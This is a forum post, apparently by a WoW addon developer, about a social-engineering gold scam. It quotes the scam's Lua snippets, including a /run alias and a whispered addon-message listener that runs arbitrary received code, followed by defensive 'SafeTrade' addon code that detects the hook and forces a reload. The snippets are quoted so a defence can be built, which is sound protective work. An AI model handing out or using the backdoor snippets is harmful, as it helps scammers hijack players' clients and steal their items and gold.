AcceptTrade gold scamming, catching hardware events

[Ketho]

There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim

Code:

/run RemoveExtraSpaces = RunScript

Whispered to victim

Code:

local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")

Addon channel

Code:

SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible counter measures:

• Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
  Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()

• Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110

Lua Code:

local addonName = ...
local f = CreateFrame("Frame")
local db
 
local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."
 
StaticPopupDialogs.SAFETRADE_WARNING = {
    text = "%s",
    button1 = OKAY,
    exclusive = 1, whileDead = 1, showAlert = 1,
}
 
function f:OnEvent(event, addon)
    if addon == addonName then
        SafeTradeDB = SafeTradeDB or {}
        db = SafeTradeDB -- init savedvars
        if db.warning then
            StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
            db.warning = nil
        end
        self:SetHook("RunScript")
    
    elseif addon == "Blizzard_DebugTools" then
        self:SetHook("DevTools_DumpCommand")
    end
end
 
function f:SetHook(func)
    hooksecurefunc(func, function()
        if _G[func] == RemoveExtraSpaces then
            -- reload asap, they cant be that fast ... right?
            db.warning = "RemoveExtraSpaces"
            StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
            self:CatchHW()
        end
    end)
end
 
local btn
 
function f:CatchHW()
    if not btn then
        btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
        btn:SetAllPoints(UIParent)
        btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
        btn:SetAttribute("macrotext", "/reload")
        --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?
        
        btn:SetFrameStrata("TOOLTIP")
        btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
    end
end
 
f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)